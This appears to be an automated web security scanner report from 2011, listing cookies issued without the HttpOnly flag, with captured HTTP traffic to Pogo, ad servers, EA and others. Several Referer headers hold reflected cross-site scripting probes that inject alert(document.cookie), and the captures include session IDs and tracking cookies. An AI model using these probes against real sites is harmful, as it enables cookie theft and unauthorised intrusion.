The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/monopoly HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/online-chess HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/risk HTTP/1.1 Host: board-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp?FlightID=2111603&Page=&PluID=0&Pos=7971\ HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BannerSource.asp HTTP/1.1 Host: bs.serving-sys.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: U=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; A2=; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; B2=; u2=0a5bbe64-f3a2-4a01-921a-a3ef743897893G6020; E2=09MY8y8ysF; C3=; u3=1; D3=;
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4288750%7E%7E0%5Eeb25Per_Played%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0%5EebVideoStarted%7E0%7E0%7E1%7E0%7E1%7E12036752%7E0&OptOut=0&ebRandom=0.4333476326428354&flv=10.1103&wmpv=0&res=128 HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: E2=09MY820wsF; A2=gn3Ka4JO09MY0000820wsF; B2=83xP0820wsF; C3=0u3F820wsF0000040_; D3=0u3F0035820wsF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1 Host: bs.serving-sys.com Proxy-Connection: keep-alive Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/cribbage HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/rainy-day-spider-solitaire HTTP/1.1 Host: card-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fs-bin/stat?id=FLenzF8lvbI&offerid=78941&type=3&subid=0&tmpid=1826 HTTP/1.1 Host: click.linksynergy.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<html> <head> <title>301 Moved Permanently</title> </head> <body> <p>The page you are requesting has moved to <a href="&partnerId=30&siteID=FLenzF8lvbI-jRY9Ep2QlsT7E2gTD46DFg">&partnerId=30&siteI ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: clubpogo-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: flash-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/4252/4762/6670-15.js?cb=0.8619239274412394 HTTP/1.1 Host: optimized-by.rubiconproject.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/?sl=2&f9258%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4225969d669=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=4252/4762; ses15=4762^1; rpb=4210%3D1; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; cd=false; au=GIP9HWY4-MADS-10.208.38.239
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:25:15 GMT Server: RAS/1.3 (Unix) Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=60; path=/; domain=.rubiconproject.com Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 02:25:15 GMT; max-age=10; path=/; domain=.rubiconproject.com Set-Cookie: ses15=4762^2; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=110084; path=/; domain=.rubiconproject.com P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT" Set-Cookie: csi15=3188204.js^1^1294536315^1294536315; expires=Sun, 16-Jan-2011 01:25:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com; Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Wed, 17 Sep 1975 21:32:10 GMT Connection: close Content-Type: application/x-javascript Content-Length: 2391
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/bejeweled2 HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /games/yahtzee-party HTTP/1.1 Host: puzzle-games.pogo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /server/pixel.htm HTTP/1.1 Host: r.turn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: uid=3011330574290390485; rds=undefined%7Cundefined%7Cundefined%7C14983; pf=TiY2Y7UsIzsDKs0LviDMrF7Y4FfMul_JqNyl-f7qrdKJwV9kSIzX4BtZ7vBDkFqi6PyIdXvx0rnLfhzRtOOBc34lLZyvKs0UYrWi2iSsDx48XfJgp4muYrbpVMBmU3OKo040jqkTNLCen_tUsnEbNt9he2SzgZbMiSxi7XoC0oAxENxfle1RGFCVxOmt4exBF6G3eK8GfPeHCjDxdpQTpQ; rv=1; rrs=undefined%7Cundefined%7Cundefined%7C4;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=3011330574290390485; Domain=.turn.com; Expires=Fri, 08-Jul-2011 02:25:53 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 09 Jan 2011 02:25:52 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /click/site=0000758630/mnum=0000906164/cstr=52607936=_4d290f90,0846642328,758630^906164^1^0,1_/xsxdata=$xsxdata/bnum=52607936/optn=64?trg=;ord=0846642328? HTTP/1.1 Host: r1.ace.advertising.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; F1=BA5Dp0EBAAAABAAAAEAAgEA; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ACID=Bc330012940999670074; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; ROLL=v5Q2V0cRVUyqcZK!;
Response
HTTP/1.1 302 Found Connection: close Date: Sun, 09 Jan 2011 02:25:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Location: /;ord=0846642328? Set-Cookie: C2=3yRKNJpwIg02FlBCdbdRZA7gHw8jGHgsjhADgaUKCKCC9mUBwxKkmhUiGgK; domain=advertising.com; expires=Tue, 08-Jan-2013 02:25:58 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Set-Cookie: 0846642328=_4d290f90,0846642328,758630^906164^1^0,1_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 02:25:58 GMT Content-Type: text/html; charset=utf-8 Content-Length: 142
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="%2f%3bord%3d0846642328%3f">here</a>.</h2> </body></html>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=755399/size=300250/u=2/bnum=72318651/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; F1=BQBFp0EBAAAABAAAAMAAaEA; BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:09 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.944664.755399.0XMC Set-Cookie: F1=BUBFp0kAAAAAHb4CAEAAgEABAAAABAAAAQAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: BASE=YnQIx9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AitvC52k1WF!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: ROLL=v5Q2Q0cRVUyqcZa/vGc3WhvkMxIiWOS7HgfCaOA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:09 GMT; path=/ Set-Cookie: 72318651=_4d291415,1206372681,755399^944664^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:09 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=758630/size=160600/u=2/bnum=52607936/hr=19/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.pogo.com%252Fgames%252Fscrabble%253FpageSection%253Dfree_home_hot_games1_pl_scrabble HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=B4hZi0EBAAAABAAAAcAAgEA; BASE=YnQI99MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YM!; ROLL=v5Q2T0cD6byq6qaxJoe34Sv8XRJi49SB7jfC09AP2YSOminn1Wmq7LDEe81vdCC!; C2=y/8JNJpwIg02FAGCdbdBgB7gHw8jGiksjhADgaAc; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:29:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.906164.758630.0XMC Set-Cookie: C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: F1=BA5Dp0EBAAAABAAAAEAAgEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: ROLL=v5Q2V0cRVUyqcZK!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:29:52 GMT; path=/ Set-Cookie: 52607936=_4d290f90,0846642328,758630^906164^1^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:29:52 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 595
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=17871065/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; GUID=MTI5NDQ1NDc3MDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ; C2=Q+QKNJpwIg02FwBCdbdBcA7gHw8jGSgsjhADgaAL; F1=BA5Dp0EBAAAABAAAAEAAgEA; BASE=YnQIy9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWK!; ROLL=v5Q2V0cRVUyqcZK!
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.955433.777340.0XMC Set-Cookie: C2=wPRKNJpwIg02FtBCdbdRbA7gHw8jGPgsjhADga0K; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: F1=BA/Ep0EBAAAABAAAAIAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:48:32 GMT; path=/ Set-Cookie: 17871065=_4d2913f0,4120808867,777340^955433^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:48:32 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1579
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /site=777340/size=300600/u=2/bnum=49979532/hr=19/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.mlive.com%252F%253Fdb83d%2527-alert%2528document.cookie%2529-%2527e027fe9bbf5%253D1 HTTP/1.1 Host: r1.ace.advertising.com Proxy-Connection: keep-alive Referer: http://www.mlive.com/?db83d'-alert(document.cookie)-'e027fe9bbf5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACID=Bc330012940999670074; aceRTB=rm=Thu, 03 Feb 2011 00:12:50 GMT|am=Thu, 03 Feb 2011 00:12:50 GMT|dc=Thu, 03 Feb 2011 00:12:50 GMT|; F1=BA/Ep0EBAAAABAAAAIAAaEA; BASE=YnQIz9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqA!; ROLL=v5Q2W0cRVUyqcZa/vGc3WhP!; C2=4PRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0K; GUID=MTI5NDUzNzcyMDsxOjE2aWYxN2Ewa3EwYmdkOjM2NQ
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 09 Jan 2011 01:49:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y" Comscore: CMXID=2115.949895.777340.0XMC Set-Cookie: C2=UQRKNJpwIg02FAHCdbdBwB7gHw8jGPgsjhADga0KoiTATslBrB; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: F1=BQBFp0EBAAAABAAAAMAAaEA; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: BASE=YnQIw9MmSf+Tkd8dWtCeW84rjjGaJlmHvEh5gB4KT4ggqyea2eW/3YWKVm/y2YMyTPzWzWqPEc0KmqQBlyv1AiN!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: ROLL=v5Q2X0cRVUyqcZa/vGc3WhvkMxIiWOC!; domain=advertising.com; expires=Tue, 08-Jan-2013 01:49:08 GMT; path=/ Set-Cookie: 49979532=_4d291414,0737842127,777340^949895^1183^0,0_; domain=advertising.com; path=/click Cache-Control: private, max-age=0, no-cache Expires: Sun, 09 Jan 2011 01:49:08 GMT Content-Type: application/x-javascript; charset=utf-8 Content-Length: 1047
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /news/technology-12126880 HTTP/1.1 Host: www.bbc.co.uk Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=160559081.1294536631.1.1.utmcsr=peanutlabs.com|utmccn=(referral)|utmcmd=referral|utmcct=/userGreeting.php; __utma=160559081.396106583.1294536631.1294536631.1294536631.1; pl_email=test4%40fastdial.net; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /js/iFrame/index.php?userId=998826224-3432-8939b981e2 HTTP/1.1 Host: www.e00.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=roj6d8htea48u7e576mme7s3h2; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
symfony=t8hoe1ig0k16bn396grb2ghf02; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hasbro HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:29 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=t8hoe1ig0k16bn396grb2ghf02; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 70504
